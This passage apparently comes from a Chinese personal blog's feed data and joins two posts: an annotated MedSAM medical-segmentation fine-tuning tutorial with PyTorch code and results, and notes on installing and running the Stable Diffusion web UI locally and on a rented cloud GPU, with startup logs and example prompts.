    seg_loss = monai.losses.DiceCELoss(sigmoid=True, squared_pred=True, reduction='mean') # 损失函数
    1
    2
    self.img_embeddings.shape=(456, 256, 64, 64), self.ori_gts.shape=(456, 256, 256)
    img_embed.shape=torch.Size([8, 256, 64, 64]), gt2D.shape=torch.Size([8, 1, 256, 256]), bboxes.shape=torch.Size([8, 4])

    training

    原作者用的是 NVIDIA RTX A5500,配有 24 GB 显存,而我的 RTX 4060 只有 8GB 显存,emmm 只能把 batch_size 调小。我调成了 8。训练过程中显存使用量一直维持在 2GB,感觉可以再调大些?

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    num_epochs = 100  # 迭代次数
    losses = [] # 空列表,用于存放每个 epoch 的损失值
    best_loss = 1e10 # 最优损失值
    train_dataset = NpzDataset(npz_tr_path) # 读入训练数据
    # 定义数据加载器以便读取和组合数据,同时将样本分成大小为 64 的批次,并打乱顺序
    train_dataloader = DataLoader(train_dataset, batch_size=64, shuffle=True)
    for epoch in range(num_epochs):
    epoch_loss = 0
    # train
    # step 表示当前处理到了第几个批次
    # image_embedding 是嵌入图像的特征向量
    # gt2D 是训练数据的真实遮罩层标签
    # boxes 是真实的 2D 边界框
    for step, (image_embedding, gt2D, boxes) in enumerate(tqdm(train_dataloader)):
    # do not compute gradients for image encoder and prompt encoder
    # 冻结 图像编码器 和 提示编码器
    with torch.no_grad():
    # convert box to 1024x1024 grid
    # 将边界框坐标从原始坐标系转换为 1024x1024 网格坐标系
    box_np = boxes.numpy()
    # 改变大小
    sam_trans = ResizeLongestSide(sam_model.image_encoder.img_size)
    # 改变提示框大小
    box = sam_trans.apply_boxes(box_np, (gt2D.shape[-2], gt2D.shape[-1]))
    # 转换成 pytorch 张量
    box_torch = torch.as_tensor(box, dtype=torch.float, device=device)
    if len(box_torch.shape) == 2:
    """
    这段代码实现的是获取提示嵌入的过程。
    首先通过 if 语句来判断 box_torch 张量的形状是否为 (B, 4),
    其中 B 表示批次大小,4 表示边界框的坐标信息(左上角点和右下角点)。
    如果 box_torch 张量的形状是 (B, 4),则执行 if 语句中的代码进行扩维处理,
    将其转换为形状为 (B, 1, 4) 的张量。
    这么做是为了在后面的计算中保证输入张量的形状一致,从而避免出现维度不匹配的错误
    """
    box_torch = box_torch[:, None, :] # (B, 1, 4)
    # get prompt embeddings 获取提示嵌入
    sparse_embeddings, dense_embeddings = sam_model.prompt_encoder(
    points=None, # 没有用到点的信息
    boxes=box_torch, # 使用边界框来提取特征
    masks=None, # 没有使用遮罩层来进行像素级的聚合
    )
    # predicted masks 前向传播
    mask_predictions, _ = sam_model.mask_decoder(
    image_embeddings=image_embedding.to(device), # (B, 256, 64, 64)
    image_pe=sam_model.prompt_encoder.get_dense_pe(), # (1, 256, 64, 64)
    sparse_prompt_embeddings=sparse_embeddings, # (B, 2, 256)
    dense_prompt_embeddings=dense_embeddings, # (B, 256, 64, 64)
    multimask_output=False,
    )

    # 计算损失函数的值
    loss = seg_loss(mask_predictions, gt2D.to(device))
    # 反向传播
    optimizer.zero_grad()
    loss.backward()
    optimizer.step()
    # 记录损失值
    epoch_loss += loss.item()

    epoch_loss /= step
    losses.append(epoch_loss)
    print(f'EPOCH: {epoch}, Loss: {epoch_loss}')
    # save the latest model checkpoint
    torch.save(sam_model.state_dict(), join(model_save_path, 'sam_model_latest.pth')) # 最近一次 checkpoint
    # save the best model
    if epoch_loss < best_loss:
    best_loss = epoch_loss
    torch.save(sam_model.state_dict(), join(model_save_path, 'sam_model_best.pth')) # 最优 checkpoint
    1
    2
    3
    4
    5
    6
    self.img_embeddings.shape=(456, 256, 64, 64), self.ori_gts.shape=(456, 256, 256)
    100%|██████████| 57/57 [00:09<00:00, 5.95it/s]
    EPOCH: 0, Loss: 0.2000392587589366
    ……
    100%|██████████| 57/57 [00:05<00:00, 11.29it/s]
    EPOCH: 99, Loss: 0.03958414628037384

    plot loss

    1
    2
    3
    4
    5
    6
    7
    plt.plot(losses)
    plt.title('Dice + Cross Entropy Loss')
    plt.xlabel('Epoch')
    plt.ylabel('Loss')
    plt.show() # comment this line if you are running on a server
    plt.savefig(join(model_save_path, 'train_loss.png'))
    plt.close()

    如果我把 pycharm 的主题设成深色的,matplotlib 输出的图片居然也会是深色的……

    png

    load the original SAM model

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    from skimage import io
    # 加载 原始 SAM 模型 到 GPU 上
    ori_sam_model = sam_model_registry[model_type](checkpoint=checkpoint).to(device)
    # 加载 predictor
    ori_sam_predictor = SamPredictor(ori_sam_model)

    # 读入数据集
    ts_img_path = 'data/MedSAMDemo_2D/test/images'
    ts_gt_path = 'data/MedSAMDemo_2D/test/labels'
    test_names = sorted(os.listdir(ts_img_path))

    # random select a test case
    # 随机读取一张图像
    img_idx = np.random.randint(len(test_names)) # 获取索引
    image_data = io.imread(join(ts_img_path, test_names[img_idx])) # 读取
    if image_data.shape[-1]>3 and len(image_data.shape)==3: # 确保图像只有 3 个通道
    image_data = image_data[:,:,:3]
    if len(image_data.shape)==2: # 如果是单通道的灰度图像,转成 3 通道
    image_data = np.repeat(image_data[:,:,None], 3, axis=-1)
    # read ground truth (gt should have the same name as the image) and simulate a bounding box
    def get_bbox_from_mask(mask):
    '''
    Returns a bounding box from a mask
    从 ground truth 中提取出边界框坐标信息,用于对图像进行裁剪
    '''
    y_indices, x_indices = np.where(mask > 0)
    x_min, x_max = np.min(x_indices), np.max(x_indices)
    y_min, y_max = np.min(y_indices), np.max(y_indices)
    # add perturbation to bounding box coordinates
    H, W = mask.shape
    x_min = max(0, x_min - np.random.randint(0, 20))
    x_max = min(W, x_max + np.random.randint(0, 20))
    y_min = max(0, y_min - np.random.randint(0, 20))
    y_max = min(H, y_max + np.random.randint(0, 20))

    return np.array([x_min, y_min, x_max, y_max])

    # 获得 ground truth
    gt_data = io.imread(join(ts_gt_path, test_names[img_idx]))
    bbox_raw = get_bbox_from_mask(gt_data)

    # preprocess: cut-off and max-min normalization 图像预处理
    lower_bound, upper_bound = np.percentile(image_data, 0.5), np.percentile(image_data, 99.5)
    image_data_pre = np.clip(image_data, lower_bound, upper_bound)
    # 亮度范围裁剪
    image_data_pre = (image_data_pre - np.min(image_data_pre))/(np.max(image_data_pre)-np.min(image_data_pre))*255.0
    image_data_pre[image_data==0] = 0
    image_data_pre = np.uint8(image_data_pre)
    H, W, _ = image_data_pre.shape

    # predict the segmentation mask using the original SAM model
    # 开跑!
    ori_sam_predictor.set_image(image_data_pre)
    ori_sam_seg, _, _ = ori_sam_predictor.predict(point_coords=None, box=bbox_raw, multimask_output=False)

    predict the segmentation mask using the fine-tuned model

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    # resize image to 3*1024*1024
    # 使用 ResizeLongestSide() 函数对原始图像进行大小调整,将其 resize 为 3x1024x1024 的张量
    sam_transform = ResizeLongestSide(sam_model.image_encoder.img_size)
    resize_img = sam_transform.apply_image(image_data_pre)
    # 将调整后的图像张量转换为 PyTorch tensor
    resize_img_tensor = torch.as_tensor(resize_img.transpose(2, 0, 1)).to(device)
    input_image = sam_model.preprocess(resize_img_tensor[None,:,:,:]) # (1, 3, 1024, 1024)
    assert input_image.shape == (1, 3, sam_model.image_encoder.img_size, sam_model.image_encoder.img_size), 'input image should be resized to 1024*1024'

    with torch.no_grad():
    # pre-compute the image embedding 使用模型的 image_encoder 对象计算图像嵌入向量
    ts_img_embedding = sam_model.image_encoder(input_image)
    # convert box to 1024x1024 grid 将 box 坐标信息调整到 1024x1024 的网络 grid 上
    bbox = sam_trans.apply_boxes(bbox_raw, (H, W))
    print(f'{bbox_raw=} -> {bbox=}')
    box_torch = torch.as_tensor(bbox, dtype=torch.float, device=device)
    if len(box_torch.shape) == 2:
    box_torch = box_torch[:, None, :] # (B, 4) -> (B, 1, 4)

    # 使用 prompt_encoder 对象计算稠密和稀疏的嵌入向量(dense and sparse embedding)
    sparse_embeddings, dense_embeddings = sam_model.prompt_encoder(
    points=None,
    boxes=box_torch,
    masks=None,
    )
    medsam_seg_prob, _ = sam_model.mask_decoder( # 各种图像嵌入向量
    image_embeddings=ts_img_embedding.to(device), # (B, 256, 64, 64)
    image_pe=sam_model.prompt_encoder.get_dense_pe(), # (1, 256, 64, 64)
    sparse_prompt_embeddings=sparse_embeddings, # (B, 2, 256)
    dense_prompt_embeddings=dense_embeddings, # (B, 256, 64, 64)
    multimask_output=False,
    )
    medsam_seg_prob = torch.sigmoid(medsam_seg_prob) # 压缩到[0, 1]
    # convert soft mask to hard mask
    medsam_seg_prob = medsam_seg_prob.cpu().numpy().squeeze()
    medsam_seg = (medsam_seg_prob > 0.5).astype(np.uint8)
    print(medsam_seg.shape)
    1
    2
    bbox_raw=array([164, 159, 189, 187], dtype=int64) -> bbox=array([[656, 636, 756, 748]], dtype=int64)
    (256, 256)

    计算准确率

    表明我们这个操作确实牛逼!

    1
    2
    3
    ori_sam_dsc = compute_dice_coefficient(gt_data>0, ori_sam_seg>0)
    medsam_dsc = compute_dice_coefficient(gt_data>0, medsam_seg>0)
    print('Original SAM DSC: {:.4f}'.format(ori_sam_dsc), 'MedSAM DSC: {:.4f}'.format(medsam_dsc))
    1
    Original SAM DSC: 0.7397 MedSAM DSC: 0.9145

    visualization functions

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    # visualization functions
    # source: https://github.com/facebookresearch/segment-anything/blob/main/notebooks/predictor_example.ipynb
    # change color to avoid red and green
    def show_mask(mask, ax, random_color=False):
    if random_color:
    color = np.concatenate([np.random.random(3), np.array([0.6])], axis=0)
    else:
    color = np.array([251/255, 252/255, 30/255, 0.6])
    h, w = mask.shape[-2:]
    mask_image = mask.reshape(h, w, 1) * color.reshape(1, 1, -1)
    ax.imshow(mask_image)

    def show_box(box, ax):
    x0, y0 = box[0], box[1]
    w, h = box[2] - box[0], box[3] - box[1]
    ax.add_patch(plt.Rectangle((x0, y0), w, h, edgecolor='blue', facecolor=(0,0,0,0), lw=2))

    _, axs = plt.subplots(1, 3, figsize=(25, 25))
    axs[0].imshow(image_data)
    show_mask(gt_data>0, axs[0])
    # show_box(box_np[img_id], axs[0])
    # axs[0].set_title('Mask with Tuned Model', fontsize=20)
    axs[0].axis('off')

    axs[1].imshow(image_data)
    show_mask(ori_sam_seg, axs[1])
    show_box(bbox_raw, axs[1])
    # add text to image to show dice score
    axs[1].text(0.5, 0.5, 'SAM DSC: {:.4f}'.format(ori_sam_dsc), fontsize=30, horizontalalignment='left', verticalalignment='top', color='yellow')
    # axs[1].set_title('Mask with Untuned Model', fontsize=20)
    axs[1].axis('off')

    axs[2].imshow(image_data)
    show_mask(medsam_seg, axs[2])
    show_box(bbox_raw, axs[2])
    # add text to image to show dice score
    axs[2].text(0.5, 0.5, 'MedSAM DSC: {:.4f}'.format(medsam_dsc), fontsize=30, horizontalalignment='left', verticalalignment='top', color='yellow')
    # axs[2].set_title('Ground Truth', fontsize=20)
    axs[2].axis('off')
    plt.show()
    plt.subplots_adjust(wspace=0.01, hspace=0)
    # save plot
    # plt.savefig(join(model_save_path, test_npzs[npz_idx].split('.npz')[0] + str(img_id).zfill(3) + '.png'), bbox_inches='tight', dpi=300)
    plt.close()

    png

    ]]>
    @@ -7111,7 +7111,7 @@ /posts/Software-Stable%20Diffusion/ - 组件
    • Git

    • Python

    • AUTOMATIC1111

    • Stable Diffusion 模型

      • 基础模型

        • Stable Diffusion 2 最重要的转变是替换文本编码器。Stable Diffusion 1 使用 OpenAl 的 CLIP,这是一种开源模型,可以了解标题对图像的描述程度。虽然模型本身是开源的,但重要的是,训练 CLIP 的数据集不是公开可用的。
          它使用已知 Stable Diffusion 2 改为使用 OpenCLIP 它是 CLIP 的开源版本数据集进行训练- LAION-5B 的美学子集,可过滤掉 NSFW 图像。Stability Al 表示 OpenCLIP “极大地提高了生成图像的质量”,事实上,在指标上优于 CLIP 的未发布版本。(有时候 2 的效果不如 1 是正常的)
        • huggingface
      • 预训练的模型(在基础模型的基础上做了与预先的微调,可以生成特定风格的人物)

    png

    模型有 ckptsafetensors

    • ckpt 比较早期,嵌入了 python 的一些脚本,容易受到病毒攻击

    • safetensors 较新,且读取速度更快

    安装

    克隆仓库

    AUTOMATIC1111/stable-diffusion-webui: Stable Diffusion web UI (github.com)

    git clone https://github.com/AUTOMATIC1111/stable-diffusion-webui

    下载模型

    以 1.5 为例:runwayml/stable-diffusion-v1-5 at main (huggingface.co)

    png

    将下载好的模型放入仓库的 models/Stable-diffusion 中:

    png

    安装 conda

    conda create -n stable-diffusion python=3.10
    conda activate stable-diffusion
    where python
    C:\Users\19048\.conda\envs\stable-diffusion\python.exe
    C:\ProgramData\anaconda3\python.exe
    C:\Users\19048\AppData\Local\Microsoft\WindowsApps\python.exe

    设置仓库根目录下,webui-user.bat 里的参数:

    # git pull
    @echo off

    set PYTHON="C:\Users\19048\.conda\envs\stable-diffusion\python.exe"
    set GIT=
    set VENV_DIR=
    set COMMANDLINE_ARGS=

    call webui.bat
    • git pull 让项目每次运行前都拉取最新的仓库,我就不设了
    • set PYTHON="C:\Users\19048\.conda\envs\stable-diffusion\python.exe" 设置 python 解释器的位置

    运行 webui

    webui-user.bat
    venv "D:\Study\1st-year-master\Code\StableDiffusion\stable-diffusion-webui\venv\Scripts\Python.exe"
    Python 3.10.9 | packaged by Anaconda, Inc. | (main, Mar 1 2023, 18:18:15) [MSC v.1916 64 bit (AMD64)]
    Commit hash: 22bcc7be428c94e9408f589966c2040187245d81
    Installing torch and torchvision
    Looking in indexes: https://pypi.org/simple, https://download.pytorch.org/whl/cu117
    Collecting torch==1.13.1+cu117
    Downloading https://download.pytorch.org/whl/cu117/torch-1.13.1%2Bcu117-cp310-cp310-win_amd64.whl (2255.4 MB)
    ━╸━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 0.1/2.3 GB 2.2 MB/s eta 0:16:38

    我试图绕开这个安装 torch 的环节,因为我觉得它安装有点慢,但是我不会😅……但是把代理关了好像还蛮快的?冀大的网速还是值得一夸。

    老是下载一半报错:

    pip._vendor.urllib3.excerptions.ReadTimeoutError: HTTPSConnectionPool(host=‘download.pytorch.org’, port=443): Read timed out.

    唉,因为用清华镜像会下成 CPU 版本的 pytorch,只能一直试了,真傻逼啊。

    结果安装到gfpgan还是失败……先吃午饭吧。


    我说婷婷!直接上网找个整合版安装包吧😅。

    打开网页报错 Something went wrong Expecting value: line 1 column 1 (char 0)的,把你梯子关了

    尝试使用xFormers会报错,好吧那就关了。

    png

    一些使用教程:

    太变态的就不发了咳咳咳……

    • cubistic painting of Samuel Beckett by Picasso and Georges Braque, analytical cubism, brushstrokes
      • 毕加索和乔治·布拉克分析立体主义笔触的塞缪尔·贝克特立体主义绘画

    ![png](cubistic painting of Samuel Beckett by Picasso and Georges Braque, analytical cubism, brushstrokes.png)

    • photo of rihanna. latex. artgerm, ilya kuvshinov, alphonse mucha. highly detailed 8 k. intricate. nikon d 8 5 0 5 5 mm. award wi
      • 蕾哈娜的照片。乳胶。Artgerm, Ilya Kuvshinov, Alphonse Mucha.高度详细的 8 K. 错综复杂。尼康 D 8 5 0 5 5 毫米奖 WI

    ![png](photo of rihanna. latex. artgerm, ilya kuvshinov, alphonse mucha. highly detailed 8 k. intricate. nikon d 8 5 0 5 5 mm. award wi.png)

    • junji ito style homer simpson, intricate, highly detailed, illustration, art by junji ito, junji ito
      • 伊藤淳二风格荷马辛普森,复杂,高度详细,插图,伊藤淳二,伊藤润二的艺术

    ![png](junji ito style homer simpson, intricate, highly detailed, illustration, art by junji ito, junji ito.png)

    • Audrey Hepburn painting by Van Gogh
      • 梵高画的奥黛丽赫本

    ![png](Audrey Hepburn painting by Van Gogh.png)

    • realistic extremely detailed portrait painting of a beautiful black woman with a robot, city street on background by Jean Delvil
      • 现实的极其详细的肖像画,一个美丽的黑人妇女与机器人,背景上的城市街道,由 Jean Delvil 绘制

    ![png](realistic extremely detailed portrait painting of a beautiful black woman with a robot, city street on background by Jean Delvil.png)

    • Michael Jackson painting by Pegaso
      • 毕加索画的迈克尔杰克逊

    ![png](Michael Jackson painting by Pegaso.png)

    • a really suspicious horse, you can just tell that it’s up to no good
      • 一匹非常可疑的马,你可以说它没有好处

    ![png](a really suspicious horse, you can just tell that it’s up to no good.png)

    线上部署

    Colab

    • 本地吃配置
    • 本地部署复杂
    • 随时随地访问
    • 免费

    ​Colab 部署地址:camenduru/stable-diffusion-webui-colab at drive (github.com)

    AutoDL

    webp

    ​租一个 2080。

    webp

    ​这里选择 v15.9

    发现你是第一次运行, 正在初始化镜像依赖
    mkdir: cannot create directory ‘/root/.cache’: File exists
    移动完成
    正在自动下载模型:
    正在下载第1个文件, 总共有1个文件
    >>> download to /root/autodl-tmp/models/checkpoint/xiaolxl/stable-diffusion-models/Anything-ink.safetensors
    downloading file [stable-diffusion-models/Anything-ink.safetensors]
    downloading... 100% 2.0 GiB/2.0 GiBiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/checkpoint/Anything-ink.safetensors
    模型下载完成
    正在自动下载vae:
    正在下载第1个文件, 总共有3个文件
    >>> download to /root/autodl-tmp/models/vae/xiaolxl/stable-diffusion-vaes/model.vae.pt
    downloading file [stable-diffusion-vaes/model.vae.pt]
    downloading... 100% 785 MiB/785 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/vae/model.vae.pt
    正在下载第2个文件, 总共有3个文件
    >>> download to /root/autodl-tmp/models/vae/xiaolxl/stable-diffusion-vaes/sdxl_vae.safetensors
    downloading file [stable-diffusion-vaes/sdxl_vae.safetensors]
    downloading... 100% 319 MiB/319 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/vae/sdxl_vae.safetensors
    正在下载第3个文件, 总共有3个文件
    >>> download to /root/autodl-tmp/models/vae/xiaolxl/stable-diffusion-vaes/vae-ft-mse-840000-ema-pruned.safetensors
    downloading file [stable-diffusion-vaes/vae-ft-mse-840000-ema-pruned.safetensors]
    downloading... 100% 319 MiB/319 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/vae/vae-ft-mse-840000-ema-pruned.safetensors
    vae下载完成
    正在自动下载核心依赖:
    正在下载第1个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/ESRGAN/xiaolxl/sdwebui_core/ESRGAN_4x.pth
    downloading file [sdwebui_core/ESRGAN_4x.pth]
    downloading... 100% 64 MiB/64 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/ESRGAN/ESRGAN_4x.pth
    正在下载第2个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/GFPGAN/xiaolxl/sdwebui_core/detection_Resnet50_Final.pth
    downloading file [sdwebui_core/detection_Resnet50_Final.pth]
    downloading... 100% 104 MiB/104 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/GFPGAN/detection_Resnet50_Final.pth
    正在下载第3个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/GFPGAN/xiaolxl/sdwebui_core/parsing_bisenet.pth
    downloading file [sdwebui_core/parsing_bisenet.pth]
    downloading... 100% 51 MiB/51 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/GFPGAN/parsing_bisenet.pth
    正在下载第4个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/GFPGAN/xiaolxl/sdwebui_core/parsing_parsenet.pth
    downloading file [sdwebui_core/parsing_parsenet.pth]
    downloading... 100% 81 MiB/81 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/GFPGAN/parsing_parsenet.pth
    正在下载第5个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/LDSR/xiaolxl/sdwebui_core/model.ckpt
    downloading file [sdwebui_core/model.ckpt]
    downloading... 100% 1.9 GiB/1.9 GiBiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/LDSR/model.ckpt
    正在下载第6个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/LDSR/xiaolxl/sdwebui_core/project.yaml
    downloading file [sdwebui_core/project.yaml]
    downloading... 100% 1.9 KiB/1.9 KiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/LDSR/project.yaml
    正在下载第7个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/RealESRGAN/xiaolxl/sdwebui_core/RealESRGAN_x4plus.pth
    downloading file [sdwebui_core/RealESRGAN_x4plus.pth]
    downloading... 100% 64 MiB/64 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/RealESRGAN/RealESRGAN_x4plus.pth
    正在下载第8个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/RealESRGAN/xiaolxl/sdwebui_core/RealESRGAN_x4plus_anime_6B.pth
    downloading file [sdwebui_core/RealESRGAN_x4plus_anime_6B.pth]
    downloading... 100% 17 MiB/17 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/RealESRGAN/RealESRGAN_x4plus_anime_6B.pth
    正在下载第9个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/ScuNET/xiaolxl/sdwebui_core/ScuNET.pth
    downloading file [sdwebui_core/ScuNET.pth]
    downloading... 100% 69 MiB/69 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/ScuNET/ScuNET.pth
    正在下载第10个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/SwinIR/xiaolxl/sdwebui_core/SwinIR_4x.pth
    downloading file [sdwebui_core/SwinIR_4x.pth]
    downloading... 100% 136 MiB/136 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/SwinIR/SwinIR_4x.pth
    正在下载第11个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/Codeformer/xiaolxl/sdwebui_core/codeformer-v0.1.0.pth
    downloading file [sdwebui_core/codeformer-v0.1.0.pth]
    downloading... 100% 359 MiB/359 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/Codeformer/codeformer-v0.1.0.pth
    核心依赖下载完成
    Python 3.10.6 (main, Oct 24 2022, 16:07:47) [GCC 11.2.0]
    Version: v1.10.1
    Commit hash: 82a973c04367123ae98bd9abdf80d9eda9b910e2
    Launching Web UI with arguments: --ckpt-dir /root/autodl-tmp/models/checkpoint --embeddings-dir /root/autodl-tmp/models/embeddings --hypernetwork-dir /root/autodl-tmp/models/hypernetwork --lora-dir /root/autodl-tmp/models/lora --vae-dir /root/autodl-tmp/models/vae --controlnet-dir /root/autodl-tmp/models/controlnet --controlnet-annotator-models-path /root/autodl-tmp/models/controlnet_annotator --dreambooth-models-path=/root/autodl-tmp/models/dreambooth --codeformer-models-path /root/autodl-tmp/models/Codeformer --gfpgan-models-path /root/autodl-tmp/models/GFPGAN --esrgan-models-path /root/autodl-tmp/models/ESRGAN --bsrgan-models-path /root/autodl-tmp/models/BSRGAN --realesrgan-models-path /root/autodl-tmp/models/RealESRGAN --scunet-models-path /root/autodl-tmp/models/ScuNET --swinir-models-path /root/autodl-tmp/models/SwinIR --ldsr-models-path /root/autodl-tmp/models/LDSR --port=6006 --skip-install --xformers --disable-safe-unpickle --enable-insecure-extension-access --no-half-vae --disable-nan-check --max-batch-count=16
    2024-11-22 10:09:33.031050: I tensorflow/core/util/port.cc:113] oneDNN custom operations are on. You may see slightly different numerical results due to floating-point round-off errors from different computation orders. To turn them off, set the environment variable `TF_ENABLE_ONEDNN_OPTS=0`.
    2024-11-22 10:09:33.031761: I external/local_tsl/tsl/cuda/cudart_stub.cc:32] Could not find cuda drivers on your machine, GPU will not be used.
    2024-11-22 10:09:33.036407: I external/local_tsl/tsl/cuda/cudart_stub.cc:32] Could not find cuda drivers on your machine, GPU will not be used.
    2024-11-22 10:09:33.096722: I tensorflow/core/platform/cpu_feature_guard.cc:210] This TensorFlow binary is optimized to use available CPU instructions in performance-critical operations.
    To enable the following instructions: AVX2 AVX512F AVX512_VNNI FMA, in other operations, rebuild TensorFlow with the appropriate compiler flags.
    2024-11-22 10:09:34.162360: W tensorflow/compiler/tf2tensorrt/utils/py_utils.cc:38] TF-TRT Warning: Could not find TensorRT
    [2024-11-22 10:09:37,570][DEBUG][git.cmd] - Popen(['git', 'version'], cwd=/root/stable-diffusion-webui, stdin=None, shell=False, universal_newlines=False)
    [2024-11-22 10:09:37,573][DEBUG][git.cmd] - Popen(['git', 'version'], cwd=/root/stable-diffusion-webui, stdin=None, shell=False, universal_newlines=False)
    ==============================================================================
    You are running torch 2.0.1+cu118.
    The program is tested to work with torch 2.1.2.
    To reinstall the desired version, run with commandline flag --reinstall-torch.
    Beware that this will cause a lot of large files to be downloaded, as well as
    there are reports of issues with training tab on the latest version.

    Use --skip-version-check commandline argument to disable this check.
    ==============================================================================
    =================================================================================
    You are running xformers 0.0.22.
    The program is tested to work with xformers 0.0.23.post1.
    To reinstall the desired version, run with commandline flag --reinstall-xformers.

    Use --skip-version-check commandline argument to disable this check.
    =================================================================================
    Tag Autocomplete: Could not locate model-keyword extension, Lora trigger word completion will be limited to those added through the extra networks menu.
    [2024-11-22 10:09:39,928][DEBUG][filelock] - Attempting to acquire lock 140561340305072 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/3991202eb69e9ddcb3b9ba80cdeb41e734ffaf844403d6c9f47d515cd88c6f29.lock
    [2024-11-22 10:09:39,928][DEBUG][filelock] - Lock 140561340305072 acquired on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/3991202eb69e9ddcb3b9ba80cdeb41e734ffaf844403d6c9f47d515cd88c6f29.lock
    [2024-11-22 10:09:39,934][DEBUG][filelock] - Attempting to acquire lock 140561340307616 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/38fc8aaae97cb6e70be4ec44770005b26ed473471362afcda62a0037d7ccf432.lock
    [2024-11-22 10:09:39,934][DEBUG][filelock] - Lock 140561340307616 acquired on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/38fc8aaae97cb6e70be4ec44770005b26ed473471362afcda62a0037d7ccf432.lock
    [2024-11-22 10:09:39,978][DEBUG][filelock] - Attempting to acquire lock 140561342047728 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/70b640f8f60b1cf0dcc72f30caf3da9495eb2fb6509da48c53374ad6806e6a9c.lock
    [2024-11-22 10:09:39,978][DEBUG][filelock] - Lock 140561342047728 acquired on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/70b640f8f60b1cf0dcc72f30caf3da9495eb2fb6509da48c53374ad6806e6a9c.lock
    [2024-11-22 10:09:39,989][DEBUG][filelock] - Attempting to acquire lock 140561340302624 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/c7237eff25787377de196961140ceaed324d859ee8de5a775d93d33a0e3fab78.lock
    [2024-11-22 10:09:39,989][DEBUG][filelock] - Lock 140561340302624 acquired on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/c7237eff25787377de196961140ceaed324d859ee8de5a775d93d33a0e3fab78.lock
    [2024-11-22 10:09:39,995][DEBUG][filelock] - Attempting to acquire lock 140561340312128 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/53c54aec2239355faffc6c5b70d0f3d05042f386f956cbec39cec46ad456f050.lock
    [2024-11-22 10:09:39,995][DEBUG][filelock] - Lock 140561340312128 acquired on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/53c54aec2239355faffc6c5b70d0f3d05042f386f956cbec39cec46ad456f050.lock
    hand_yolov8n.pt: 0%| | 0.00/6.24M [00:00<?, ?B/s]
    person_yolov8n-seg.pt: 0%| | 0.00/6.78M [00:00<?, ?B/s]

    person_yolov8s-seg.pt: 0%| | 0.00/23.9M [00:00<?, ?B/s]


    face_yolov8n.pt: 0%| | 0.00/6.23M [00:00<?, ?B/s]



    hand_yolov8n.pt: 100%|█████████████████████| 6.24M/6.24M [00:01<00:00, 6.23MB/s]
    [2024-11-22 10:09:41,420][DEBUG][filelock] - Attempting to release lock 140561340305072 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/3991202eb69e9ddcb3b9ba80cdeb41e734ffaf844403d6c9f47d515cd88c6f29.lock
    [2024-11-22 10:09:41,420][DEBUG][filelock] - Lock 140561340305072 released on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/3991202eb69e9ddcb3b9ba80cdeb41e734ffaf844403d6c9f47d515cd88c6f29.lock

    person_yolov8n-seg.pt: 100%|███████████████| 6.78M/6.78M [00:01<00:00, 5.19MB/s]
    [2024-11-22 10:09:41,779][DEBUG][filelock] - Attempting to release lock 140561340307616 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/38fc8aaae97cb6e70be4ec44770005b26ed473471362afcda62a0037d7ccf432.lock
    [2024-11-22 10:09:41,780][DEBUG][filelock] - Lock 140561340307616 released on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/38fc8aaae97cb6e70be4ec44770005b26ed473471362afcda62a0037d7ccf432.lock



